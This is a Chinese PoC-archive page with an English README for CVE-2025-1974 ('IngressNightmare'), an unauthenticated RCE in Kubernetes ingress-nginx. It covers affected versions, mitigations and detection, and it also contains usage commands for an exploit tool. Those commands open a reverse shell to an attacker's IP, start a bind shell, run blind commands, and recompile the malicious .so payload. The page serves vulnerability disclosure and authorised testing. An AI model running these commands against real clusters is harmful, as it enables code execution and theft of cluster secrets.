关联漏洞
标题:
Kubernetes ingress-nginx 安全漏洞
(CVE-2025-1974)
描述:Kubernetes ingress-nginx是云原生计算基金会(Cloud Native Computing Foundation)开源的Kubernetes 的入口控制器,使用NGINX作为反向代理和负载均衡器。 Kubernetes ingress-nginx存在安全漏洞,该漏洞源于在某些条件下,未认证的攻击者可通过访问pod网络在ingress-nginx控制器环境中执行任意代码,可能导致Secrets泄露。
描述
CVE-2025-1974
介绍
# IngressNightmare: CVE-2025-1974 - Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX 👻
# 🧾 Description:
This vulnerability allows remote attackers to execute arbitrary code on affected installations of kubernetes/ingress-nginx. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of HTTP requests.
It is triggered by sending two request. One is a long buffered request to the NGINX server in same pod, then nginx will cache it as a temporary file. The second request is a request to the admission validating webhook server, which will trigger the admission webhook to write a temporary nginx config which contains the `ssl_engine` `badso_location`; directive. Then the admission webhook will run `nginx -t` to check the config, which will triggered remote code execution in the context of the NGINX server.
# 🎯 Impact:
CVSS v3.1 score: 9.8 (Critical ⚫️)
+ Attackers gain the ability to load shared libraries, achieve RCE within the ingress-nginx pod, and access all cluster secrets, potentially leading to cluster takeover.
+ It's part of a family dubbed IngressNightmare, which includes four other related flaws with similar injection capabilities
# ✅ Affected Versions:
## Versions affected:
+ All versions < v1.11.0
+ v1.11.0 – v1.11.4
+ v1.12.0
Patched in:
+v1.11.5
+v1.12.1 and newer
# 🚨 Exploitation Path:
1 . Upload a malicious .so file using a large HTTP POST to trigger NGINX’s client-body buffering.
2 . Use a crafted AdmissionReview with injection via annotations to load the file using ssl_engine.
3 . Trigger nginx -t, which loads the library, leading to remote code execution in the controller pod
# 🔧 Mitigation Steps:
1. Upgrade Immediately
+ Upgrade to v1.11.5 or v1.12.1+ of ingress-nginx
2. Temporary Workarounds (if patching isn’t possible yet)
+ Disable the admission webhook:
+ Helm users: controller.admissionWebhooks.enabled=false
+ Manual installs: remove --validating-webhook and delete ValidatingWebhookConfiguration
+ Restrict network access: stop pods from reaching the admission webhook via network policies; ideally only allow access from kube-apiserver
# 🔍 Detection & Monitoring
+ Look for use of ssl_engine or unusual NGINX commands in webhook logs.
+ Use audit trails to check for suspicious AdmissionReview requests.
+ Run Nuclei detection templates to scan externally or internally for vulnerable setups
# ✅ Summary:
CVE‑2025‑1974 is a severe RCE vulnerability in ingress-nginx’s admission controller that enables unauthenticated pod‑to‑pod attacks resulting in full cluster compromise. The fix is straightforward: upgrade to v1.11.5 or v1.12.1+, or disable/restrict the validating admission webhook. If you manage Kubernetes clusters, treat this as a high urgency patch and remediation effort.
# 💀 Exploitation:
```
# reverse shell
./ingressnightmare -m r -r ${ur_ip} -p ${port} -i ${INGRESS} -u ${UPLOADER}
# bind shell # maybe lost?
./ingressnightmare -m b -b ${port} -i ${INGRESS} -u ${UPLOADER}
# blind command execution
./ingressnightmare -m c -c 'date >> /tmp/pwn; echo eson pwn >> /tmp/pwn' -i ${INGRESS} -u ${UPLOADER}
# for CVE-2025-24514 - auth-url injection
# This is the default mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-auth-url
# same as
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER}
# for CVE-2025-1097 - auth-tls-match-cn injection,
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-match-cn --auth-secret-name ${secret_name}
# for CVE-2025-1098 – mirror UID injection -- all available
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-mirror-uid
## Advanced usage
# Send only admission request
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so # --is-auth-url # --is-match-cn # --is-mirror-uid ...
# Send only upload request loop
./ingressnightmare -m c -c "your command" -u ${UPLOADER} --only-upload
# dry run mode
## dry run to lookup payload so
./ingressnightmare -m c -c 'your command' -u ${UPLOADER} --dry-run
# dump with > /tmp/evil.so
## dry run to lookup raw nginx admission
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so --dry-run # --is-auth-url # --is-match-cn # --is-mirror-uid ...
## verbose mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -v # debug
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -vv # trace
./ingressnightmare -vv # -i ${INGRESS} -u ${UPLOADER} # -m c -c 'your command'
## if get error like Exec format error, that means the payload is not compatible with the target system.
## It maybe caused by the target system is arm64, but the payload is x86_64.
## Also the libc version and kernel version may cause this error.
## This exp Works on 5.10 kernel without libc.
## recompile c
./ingressnightmare show-c > exp.c
gcc -fPIC -nostdlib -ffreestanding -fno-builtin -o danger.so exp.c -shared
./ingresnightmare -m c -c 'your command' --so ./danger.so -i ${INGRESS} -u ${UPLOADER}
```
# ⚠️ Disclaimer:
For educational and research purposes only. Use only against systems you own or have permission to test.
文件快照
[4.0K] /data/pocs/8050628d5a9271fa3e8745648a4f755105fd56b0
├── [ 264] bad_config.conf
├── [ 792] build.yaml
├── [5.1K] danger.c
├── [8.5K] exploit.go
├── [2.0K] go.mod
├── [ 715] goreleaser.yaml
├── [ 15K] go.sum
├── [8.0K] main.go
├── [ 246] Makefile
├── [2.8K] payload.go
├── [5.2K] README.md
└── [2.3K] validate.json
0 directories, 12 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。